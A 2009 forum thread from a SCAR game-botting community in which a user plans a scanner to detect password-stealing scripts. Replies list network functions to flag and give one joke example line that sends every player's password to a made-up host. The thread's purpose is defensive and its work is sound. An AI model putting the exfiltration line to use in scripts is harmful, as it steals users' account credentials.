Results 1 to 7 of 7

Thread: Need Help with scar functions.

  1. #1
    Join Date
    Nov 2008
    Location
    Norway, Alesund
    Posts
    924
    Mentioned
    0 Post(s)
    Quoted
    37 Post(s)

    Default Need Help with scar functions.

    Hello, i have idea to create script checker. Example you put script into my application. and it checks or script is clear. no password scamming or something like that.

    so for that. i need SRL-Members or Dev's help. i need all passable function which ones can steal an secret info which really not needed to autoing. I suppose better do not post these kind functions directly into forums my msn is Laimonas171@live.com or pm me here. . write that functions, or procedures. which ones really can steel anything secret.
    Last edited by Laimonas171; 08-08-2009 at 05:52 PM.

  2. #2
    Join Date
    Sep 2007
    Location
    Pennsylvania
    Posts
    3,396
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    I've never used any functions dealing with sending info to a third party, but one way you could do it is simply check for multiple occurances of Players[0].Pass. The only place a scripter should need to do that is in DeclarePlayers (or nowhere at all, if using a form). Thus, if it appears outside of DeclarePlayers, something's not right

  3. #3
    Join Date
    Nov 2008
    Location
    Norway, Alesund
    Posts
    924
    Mentioned
    0 Post(s)
    Quoted
    37 Post(s)

    Default

    Quote Originally Posted by Runescapian aka Tad View Post
    I've never used any functions dealing with sending info to a third party, but one way you could do it is simply check for multiple occurances of Players[0].Pass. The only place a scripter should need to do that is in DeclarePlayers (or nowhere at all, if using a form). Thus, if it appears outside of DeclarePlayers, something's not right
    Hm. idk, how to find value and except it in declare players. going to search info on MS

  4. #4
    Join Date
    Mar 2007
    Posts
    3,116
    Mentioned
    0 Post(s)
    Quoted
    2 Post(s)

    Default

    Getpage
    OpenWebPage
    PostHTTPPage(ex)
    SendConnectionData

    I think thats it without plugins

  5. #5
    Join Date
    Mar 2009
    Location
    Illinois
    Posts
    292
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    SCAR Code:
    for i := 0 to high(players) do SendInfo(Players[i].Pass, 'Freewebs.com/passwordstealing');
    Look out for anything like that ;P

  6. #6
    Join Date
    Feb 2009
    Location
    Hungary (GMT + 1)
    Posts
    1,774
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    SCAR Code:
    procedure StealPassword;
    procedure HackAccount;
    procedure Iwillstealyouracc;

  7. #7
    Join Date
    Nov 2008
    Location
    Norway, Alesund
    Posts
    924
    Mentioned
    0 Post(s)
    Quoted
    37 Post(s)

    Default

    Quote Originally Posted by Sabzi View Post
    Code:
    procedure StealPassword;
    procedure HackAccount;
    procedure Iwillstealyouracc;

    Fun. but i really want to make it.

    Quote Originally Posted by MylesMadness
    Getpage
    OpenWebPage
    PostHTTPPage(ex)
    SendConnectionData

    I think thats it without plugins
    ty i think it helps. i will release beta soon.


    EDIT: here is thread with SSS (SrlScriptScanner)
    Last edited by Laimonas171; 08-09-2009 at 09:22 PM.

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •